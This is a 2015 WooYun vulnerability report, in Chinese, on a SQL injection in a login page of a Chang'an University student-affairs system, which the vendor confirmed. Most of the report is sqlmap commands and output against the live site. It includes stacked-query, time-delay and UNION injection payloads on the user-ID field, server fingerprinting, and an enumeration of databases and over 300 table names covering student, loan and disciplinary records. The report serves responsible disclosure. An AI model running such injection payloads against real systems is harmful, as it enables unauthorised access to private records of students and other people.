乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-14: 细节已通知厂商并且等待厂商处理中 2015-09-14: 厂商已经确认,细节仅向厂商公开 2015-09-24: 细节向核心白帽子及相关领域专家公开 2015-10-04: 细节向普通白帽子公开 2015-10-14: 细节向实习白帽子公开 2015-10-29: 细节向公众公开
存在post注入漏洞,成功注入,可能被利用。
http://**.**.**.**/Login/loginpageforstudentb.aspx
通过Firefox拿到post提交的参数
C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/Login/loginpageforuserb.aspx?LogoutURL=%2flogin" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=%2FwEWBALRycKqBAKz8dy8BQKd%2B7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj%2BEh1&txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95"sqlmap resumed the following injection point(s) from stored session:---Parameter: txtUserId (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=/wEWBALRycKqBAKz8dy8BQKd 7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj Eh1&txtUserId=admin';WAITFOR DELAY '0:0:5'--&txtPwd=admin&Button1=%E7%99%BB %E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi k WFpeiLseaWh WNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=/wEWBALRycKqBAKz8dy8BQKd 7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj Eh1&txtUserId=admin' UNION ALLSELECT NULL,NULL,NULL,NULL,CHAR(113) CHAR(122) CHAR(112) CHAR(113) CHAR(113) CHAR(65) CHAR(100) CHAR(120) CHAR(106) CHAR(113) CHAR(71) CHAR(108) CHAR(120) CHAR(109) CHAR(105) CHAR(113) CHAR(113) CHAR(107) CHAR(118) CHAR(113),NULL-- &txtPwd=admin&Button1=%E7%99%BB %E5%BD%95---[23:14:50] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000
存在post注入
C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/Login/loginpageforuserb.aspx?LogoutURL=%2flogin" --data "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTMzNDE0ODA3Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZLSYCORN6h0rMqu3q0C3IyTBvPEM&__EVENTVALIDATION=%2FwEWBALRycKqBAKz8dy8BQKd%2B7qdDgKM54rGBtwGIduop2gla2ks2iURfMhj%2BEh1&txtUserId=admin&txtPwd=admin&Button1=%E7%99%BB+%E5%BD%95" --dbs[23:16:55] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[23:16:55] [INFO] fetching database names[23:16:55] [INFO] the SQL query used returns 8 entries[23:16:55] [INFO] resumed: master[23:16:55] [INFO] resumed: model[23:16:55] [INFO] resumed: msdb[23:16:55] [INFO] resumed: Northwind[23:16:55] [INFO] resumed: pubs[23:16:55] [INFO] resumed: StudWork[23:16:55] [INFO] resumed: tempdb[23:16:55] [INFO] resumed: 长安大学_学工在线available databases [8]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] StudWork[*] tempdb[*] 长安大学_学工在线
检测出了数据库随便挑了一个看了一下
C:\Python27\sqlmap>sqlmap.py -px?LogoutURL=%2flogin" --dataPDwUKLTMzNDE0ODA3Mg9kFgICAw9kF4%2FlhYHorrjmnIDlpJrovpPlhaXlr%2Bk2BWFpeiLseaWh%2BWNleW8leW3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU4jeiDveS4uuepugril4%2FlhYHorrjbyPOuS4jeWFgeiuuOi%2Bk%2BWFpei3IyTBvPEM&__EVENTVALIDATION=%2a2ks2iURfMhj%2BEh1&txtUserId=a长安大学_学工在线 --tablesDatabase: 长安大学_学工在线[309 tables]+----------------------------+| LUMIGENT_PROFILER || VoteList || Vsign_AgtRegistryFell || Vsign_AgtRegistryFell || Vsign_AgtRegistryOrder || Vdorm_buildingInfo【不用】| Vdorm_buildingInfo【不用】| tDorm_User不用| tEmp_pblDocument? || tEmp_pblEmploymentType? || tEmp_pblFriendlyConnect? || tEmp_pblMessageInfo? || tEmp_pblNewsPic? || tEmp_pblRelTopicMsg? || tEmp_pblTopic? || tEmp_studDepartment(不用,暂| tEmp_studStudFavorite? || vDorm_OccupiedRoom不用| dtproperties || sysconstraints || syssegments || tAcc_File || tCadreGroup_state || tCadre_dimission || tDerate_Temp || tDorm_Bed || tDorm_Building || tDorm_History || tDorm_RewardHistory || tDorm_Room || tDorm_RoomType || tEmp_BothMeeting || tEmp_BothMeetingUnit || tEmp_BothMeetingUnitSpec || tEmp_ViewCounter || tEmp_codeComputerLevel || tEmp_codeForeignLanguage || tEmp_codeIdentity || tEmp_codeLiteracyDegree || tEmp_codeMandarin || tEmp_codeUnitEconomyType || tEmp_codeUnitLevel || tEmp_codeUnitSubjection || tEmp_codeUnitTrade || tEmp_codeUnitType || tEmp_codeWageManageType || tEmp_gbRegionalism || tEmp_gbWedlock || tEmp_pblDeptDate || tEmp_pblEmployment || tEmp_pblSpecIntro || tEmp_signAgtRegistry || tEmp_studAcc || tEmp_studFavorite || tEmp_studFocusFromEnt || tEmp_studIntro || tEmp_studTouch || tEmp_unitBaseInfo || tEmp_unitCompanyAcc || tEmp_unitCorpEmploy || tEmp_unitCorpFavorite || tEmp_unitCorpPublicize || tEmp_unitEntrLoginInfo || tEmp_unitFocusFromStudents || tFile_Video || tGreen_Apply || tMin_Activity || tMin_InMoney || tMin_OutMoney || tMin_Visit || tPoor_Student || tPopedom_Atom || tSim_Appraise || tSim_Punish || tSim_Reward || tStudCadre_Info || tStudCadre_Type || tStudCadre_Unit || tStud_AllowApply || tTemp_Apply || tarm_AwardList || tarm_StudCourse || tarm_StudLevy || tarm_StudRecord || tarm_policy || tarrear_enrol || tarrear_ratify || tarrear_repay || tasl_Affirm || tasl_BankAuditing || tasl_BankAuditing || tasl_BankBargain || tasl_Breach || tasl_Compensate || tasl_End || tasl_Estate || tasl_Extend || tasl_Familial || tasl_Imburse || tasl_LoanType || tasl_Postponed || tasl_SchoolAuditingIdea || tasl_SchoolAuditingIdea || tasl_StudRequisition || tasl_Whither || tbase_Department || tbase_Teacher || tbase_User || tborrow_enrol || tborrow_ratify || tborrow_repay || tcard_MakeCard || tcgb_Folk || tcgb_PolityVisage || tcgb_Regionalism || tcgt_AwardGrade || tcgt_AwardList || tcgt_ClassRelation || tcgt_StudCourse || tcgt_StudRecord || tcgt_stdResultCell || tcgt_stdScale || tcmoe_BloodType || tcmoe_Emigrant || tcmoe_PunishType || tcmoe_RewardLevel || tcmoe_RewardType || tcode_Academic || tcode_Aspect || tcode_Degree || tcode_LenOfSchool || tcode_Post || tcode_PsychologyLevel || tcode_RewardItem || tcode_StudType || tcode_poorType || tcpt_BranchActivity || tcpt_ClassRelation || tcpt_Document || tcpt_MemberStudy || tcpt_PartyActive || tcpt_PartyBranch || tcpt_PartyMember || tcpt_PartyPrep || tcpt_PersonRelation || tcpt_Requisition || tderate_AuditSchooling || tderate_RegSchooling || tdm_ZZMM || tev_ClassAssess || tev_ClassAssessTemp || tev_EvaluatingItem || tev_EvaluatingType || tev_StudAssess || tev_StudAssessTemp || tgreen_Charge || tgreen_temp || tins_InsCompany || tins_InsGrade || tins_InsItem || tins_InsPayForMoney || tins_InsRegStudent || titem_DeregType || titem_PartyBranchType || titem_PartyMemberType || titem_PartySchoolType || tlv_Procedure || tlv_RegForAbnormity || tlv_RegForGraduate || tlv_Schema || tmem_BookEnrol || tmem_ChooseCadre || tmem_DevelopmentNum || tmem_DevelopmentNum || tmem_MemBerDocment || tmem_MemBerDocment || tmem_MemCharge || tmem_OrgType || tmem_PartyNum || tmem_PartyNum || tmem_Record || tmem_Rewards || tmem_TrainDepartment || tmem_TrainManInfo || tmem_orgMan || tmem_organization || tmema_ActivityApply || tmema_ActivityAudit || tmema_ActivityField || tmema_AssnJob || tmema_AssnMember || tmemp_Activity || tmemp_ComAuthor || tmemp_ComManuscript || tmemp_ComReport || tmemp_PublicationIssue || tmemp_PulicJob || tpbl_SpecIntro || tpoor_poorStudent || tpopedom_UserBackManage || tpopedom_UserModule || tpsy_BBSMain || tpsy_BBSRestore || tpsy_Dossier || tpsy_Emphases || tpsy_Preengage || tpsy_Talk || tpsy_Work || tpunish_Information || tpunish_Repeal || treward_Information || treward_Repeal || treward_Type || tschol_Annotion || tschol_Apply || tschol_Classify || tschol_Quotas || tschol_RankObj || tstipend_Annotion || tstipend_Apply || tstipend_Classify || tstipend_Quotas || tstipend_RankObj || tstud_Educate || tstud_Family || tstud_Graduate || tstud_Member || tstud_Student || tsubsidy_Annotion || tsubsidy_Apply || tsubsidy_Classify || tsubsidy_Quotas || tsubsidy_RankObj || tsys_BackUp || tsys_Download || tsys_EmpNavigation || tsys_FriendlyLink || tsys_Message || tsys_Modules_测试| tsys_Modules_长安大学| tsys_NoticeInterface || tsys_NoticeInterface || tsys_NoticeType || tsys_NoticeType长安大学| tsys_Options || tsys_VoteList || tsys_VoteProject || tsys_VoteRen || tsys_loginLog || tsys_loginSession || twl_WorkLog || twork_Apply || twork_CheckIn || twork_PayMoney || twork_PostObj || twork_PostType || vAloan_ListAff || vAloan_ListBasic || vAloan_ListExtend || vDerate_green_Stat || vDorm_AllRoomDetail || vDorm_Bed || vDorm_CanBePreared || vDorm_CanUseBed || vDorm_Preared || vDorm_UsedBed || vDorm_room || vDorm_student
一共三百多个表,内容太丰富,也没有继续研究和尝试下去的兴趣了。就告一段落了。
sql注入也是需要耐心和毅力的
危害等级:中
漏洞Rank:6
确认时间:2015-09-14 12:55
通知处理中
暂无